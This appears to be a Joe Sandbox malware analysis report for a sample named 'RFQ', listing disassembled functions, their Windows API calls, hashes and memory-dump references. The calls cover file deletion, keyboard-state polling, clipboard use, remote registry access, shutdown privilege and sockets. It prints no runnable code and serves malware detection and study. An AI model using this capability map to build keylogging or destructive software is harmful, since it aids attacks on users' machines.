                                                                                                                                                    • _memset.LIBCMT ref: 0076A6E5
                                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0076A704
                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 0076A715
                                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0076A752
                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0076A76E
                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 0076A78B
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0076A79A
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0076A7A1
                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0076A7C2
                                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 0076A7C9
                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0076A7FA
                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0076A820
                                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0076A834
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3996160137-0
                                                                                                                                                    • Opcode ID: 37ed64a5ff4eefbac859f33954d1295ade88c6094e01c61f1e9a724ec889b0c4
                                                                                                                                                    • Instruction ID: 146f3773013c0bc0766747899d686148052d6be106090b186e1f53512bf99097
                                                                                                                                                    • Opcode Fuzzy Hash: 37ed64a5ff4eefbac859f33954d1295ade88c6094e01c61f1e9a724ec889b0c4
                                                                                                                                                    • Instruction Fuzzy Hash: 9751197190020ABFDF119F95DC85EEEBBB9FF04300F048129E916A7291EB399A05CF65
                                                                                                                                                    Function 00736F07 Relevance: 20.9, Strings: 16, Instructions: 883COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: }$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$}}} }
                                                                                                                                                    • API String ID: 0-1974830898
                                                                                                                                                    • Opcode ID: a38610a603901aa28e2bdc7f38440fe7ea8e59dbfe90a2768f30a77bb396dedf
                                                                                                                                                    • Instruction ID: ed0e53e148a1031a24683fb5b6984e957f5cf58af90513fd82896e468fe2af3e
                                                                                                                                                    • Opcode Fuzzy Hash: a38610a603901aa28e2bdc7f38440fe7ea8e59dbfe90a2768f30a77bb396dedf
                                                                                                                                                    • Instruction Fuzzy Hash: BA7284B1E05259DBDF24CF59C8407EEB7B5BF48310F14816AE815EB281DB789E81DB90
                                                                                                                                                    Function 007763F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00776EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00775FA6,?), ref: 00776ED8
                                                                                                                                                      • Part of subcall function 007772CB: GetFileAttributesW.KERNEL32(?,00776019), ref: 007772CC
                                                                                                                                                    • _wcscat.LIBCMT ref: 00776441
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 0077645F
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00776474
                                                                                                                                                    • _wcscpy.LIBCMT ref: 007764A3
                                                                                                                                                    • _wcscat.LIBCMT ref: 007764B8
                                                                                                                                                    • _wcscat.LIBCMT ref: 007764CA
                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 007764DA
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007764EB
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00776506
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                                                    • String ID: \*.*
                                                                                                                                                    • API String ID: 2643075503-1173974218
                                                                                                                                                    • Opcode ID: 854ab6d6014c7be84c67841a389d76ac1fcdb2c15a0dca6bab504b4bc43cae78
                                                                                                                                                    • Instruction ID: 4af476337466d53098a2005eaf570db9c9bc0fdc0e831cbef6228a7a4d883954
                                                                                                                                                    • Opcode Fuzzy Hash: 854ab6d6014c7be84c67841a389d76ac1fcdb2c15a0dca6bab504b4bc43cae78
                                                                                                                                                    • Instruction Fuzzy Hash: CD3188B24083889EC721DBA48889EDB77DC6F56350F44492AF9D8C3141FA39D54D87A7
                                                                                                                                                    Function 007931BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00793C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00792BB5,?,?), ref: 00793C1D
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0079328E
                                                                                                                                                      • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
                                                                                                                                                      • Part of subcall function 0073936C: __itow.LIBCMT ref: 007393DF
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0079332D
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007933C5
                                                                                                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00793604
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00793611
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1240663315-0
                                                                                                                                                    • Opcode ID: 5c076a09b89e099c9d304f6e520cddb739042f8a5a23822050b661932d89869b
                                                                                                                                                    • Instruction ID: dc1912c0cd036597ee2ec87ec5552d0412b9848a34dcd96ed2d2fc9b75b0e981
                                                                                                                                                    • Opcode Fuzzy Hash: 5c076a09b89e099c9d304f6e520cddb739042f8a5a23822050b661932d89869b
                                                                                                                                                    • Instruction Fuzzy Hash: 3FE14B71604200EFCB15DF28D995E2ABBE8EF88710F04856DF44ADB262DB38ED05CB52
                                                                                                                                                    Function 00772B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00772B5F
                                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00772BE0
                                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00772BFB
                                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00772C15
                                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00772C2A
                                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00772C42
                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00772C54
                                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00772C6C
                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 00772C7E
                                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00772C96
                                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00772CA8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                    • Opcode ID: 480c85fe72c579543b3ded876fc601854cc3b08e2c84d82074802503bceaa35e
                                                                                                                                                    • Instruction ID: 50ce50187954259f46e883cf2eeb1c62603369614da3b03cb021bb4c9137f61d
                                                                                                                                                    • Opcode Fuzzy Hash: 480c85fe72c579543b3ded876fc601854cc3b08e2c84d82074802503bceaa35e
                                                                                                                                                    • Instruction Fuzzy Hash: 0741F6705047C96DFF369B6488047B9BEA0AF22384F04C059D5EA562C3EB9C9DC5C7B6
                                                                                                                                                    Function 00786D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1737998785-0
                                                                                                                                                    • Opcode ID: a1a06dbfa4557d89d4d114676526609efc92a2b7719909c6802b56341f8ba001
                                                                                                                                                    • Instruction ID: 07eaf522273b9709dd683927efed60bb7e027603df274d21c03fdcc42c090b00
                                                                                                                                                    • Opcode Fuzzy Hash: a1a06dbfa4557d89d4d114676526609efc92a2b7719909c6802b56341f8ba001
                                                                                                                                                    • Instruction Fuzzy Hash: A2217A36300210AFDB21AF64DC49F6D77A8EF04751F04C019F90A9B2A1EB78ED018BA9
                                                                                                                                                    Function 0078C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00769ABF: CLSIDFromProgID.OLE32 ref: 00769ADC
                                                                                                                                                      • Part of subcall function 00769ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00769AF7
                                                                                                                                                      • Part of subcall function 00769ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00769B05
                                                                                                                                                      • Part of subcall function 00769ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00769B15
                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0078C235
                                                                                                                                                    • _memset.LIBCMT ref: 0078C242
                                                                                                                                                    • _memset.LIBCMT ref: 0078C360
                                                                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0078C38C
                                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 0078C397
                                                                                                                                                    Strings
                                                                                                                                                    • NULL Pointer assignment, xrefs: 0078C3E5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                                                    • API String ID: 1300414916-2785691316
                                                                                                                                                    • Opcode ID: 05c28cef8a6f8d356d79d47f55ed5e442c1be6acc9afbebad2c282eaf6e9b2b0
                                                                                                                                                    • Instruction ID: 299bb9dd10bcc500eebe7a92952ef27f6bfe3f73eaeca69db2ddf72a02c04ee0
                                                                                                                                                    • Opcode Fuzzy Hash: 05c28cef8a6f8d356d79d47f55ed5e442c1be6acc9afbebad2c282eaf6e9b2b0
                                                                                                                                                    • Instruction Fuzzy Hash: 71913C71D40218EBDB11EF94DC95EEEBBB8EF08710F10815AF919A7281EB745A45CFA0
                                                                                                                                                    Function 007779D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0076B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0076B180
                                                                                                                                                      • Part of subcall function 0076B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0076B1AD
                                                                                                                                                      • Part of subcall function 0076B134: GetLastError.KERNEL32 ref: 0076B1BA
                                                                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00777A0F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                    • String ID: $@$SeShutdownPrivilege
                                                                                                                                                    • API String ID: 2234035333-194228
                                                                                                                                                    • Opcode ID: c14b9b104ec9218cd8653d55516af585ee227687dfd7cedba44418ccf522ae48
                                                                                                                                                    • Instruction ID: 367aae089661b00140149f594afb90930b8f710b893014d36e3f0fe16a84868e
                                                                                                                                                    • Opcode Fuzzy Hash: c14b9b104ec9218cd8653d55516af585ee227687dfd7cedba44418ccf522ae48
                                                                                                                                                    • Instruction Fuzzy Hash: 17018471659212AAFF2C666CDC5FFBE72589B007C0F16C924BD4BA20D2E9AD5E00C1A4
                                                                                                                                                    Function 00788C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00788CA8
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00788CB7
                                                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00788CD3
                                                                                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00788CE2
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00788CFC
                                                                                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00788D10
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1279440585-0
                                                                                                                                                    • Opcode ID: 40bcb01f2d85ddb7876eaec253c09421e944ea24f9c93a1e8977f03922d06c57
                                                                                                                                                    • Instruction ID: e6060ddd0cf95369dceaec31dd4fea838ae3b4c3a4819393202d3d36918df3db
                                                                                                                                                    • Opcode Fuzzy Hash: 40bcb01f2d85ddb7876eaec253c09421e944ea24f9c93a1e8977f03922d06c57
                                                                                                                                                    • Instruction Fuzzy Hash: 4721B171600201DFDB20FF68D989F6EB7A9EF48320F108158F916A72D2DB78AD418B61
                                                                                                                                                    Function 00776532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00776554
                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00776564
                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00776583
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 007765A7
                                                                                                                                                    • _wcscat.LIBCMT ref: 007765BA
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 007765F9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1605983538-0
                                                                                                                                                    • Opcode ID: 04a04d14c5e9036ca9bfdbe14b21e9e784e11341cd1fdb58c251b7eb8564a6fe
                                                                                                                                                    • Instruction ID: 1a6cf9ac413aeb9c8a5463b7be57c05d8ec109030c4c39a641add60a85e253c5
                                                                                                                                                    • Opcode Fuzzy Hash: 04a04d14c5e9036ca9bfdbe14b21e9e784e11341cd1fdb58c251b7eb8564a6fe
                                                                                                                                                    • Instruction Fuzzy Hash: 1B21957190021CEBDF20ABA4CC88FDDB7BCAB08340F5044A5E509E7145EB799F95DB60
                                                                                                                                                    Function 00739B60 Relevance: 8.6, Strings: 6, Instructions: 1055COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$}
                                                                                                                                                    • API String ID: 0-2976310808
                                                                                                                                                    • Opcode ID: 2f26e945d99406104b9f9d341ede8b3460a4fc148200911987ca695fb74d0135
                                                                                                                                                    • Instruction ID: 83beae5d92a0f35aaa1d48cc63afedae50075d2dc001f9898013654e5e092c75
                                                                                                                                                    • Opcode Fuzzy Hash: 2f26e945d99406104b9f9d341ede8b3460a4fc148200911987ca695fb74d0135
                                                                                                                                                    • Instruction Fuzzy Hash: B5929171E0021ACBEF24CF58C8417FDB7B1BB54314F14819AE956AB282E7B99D81CF91
                                                                                                                                                    Function 007713CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007713DC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                    • String ID: ($,2~$<2~$|
                                                                                                                                                    • API String ID: 1659193697-1525565811
                                                                                                                                                    • Opcode ID: a0bc18055a4148fa50808dac3274c6edf05446502371a6d4271ba1794eea4fb1
                                                                                                                                                    • Instruction ID: f5cb408764145e48a2e88f778a723e168d636f5b4d863b63b057509d775ed066
                                                                                                                                                    • Opcode Fuzzy Hash: a0bc18055a4148fa50808dac3274c6edf05446502371a6d4271ba1794eea4fb1
                                                                                                                                                    • Instruction Fuzzy Hash: 24321375A00605DFCB28CF69C480A6AB7F0FF48360B51C56EE59ADB3A2E774E941CB44
                                                                                                                                                    Function 0078923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0078A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0078A84E
                                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00789296
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,00000000), ref: 007892B9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLastinet_addrsocket
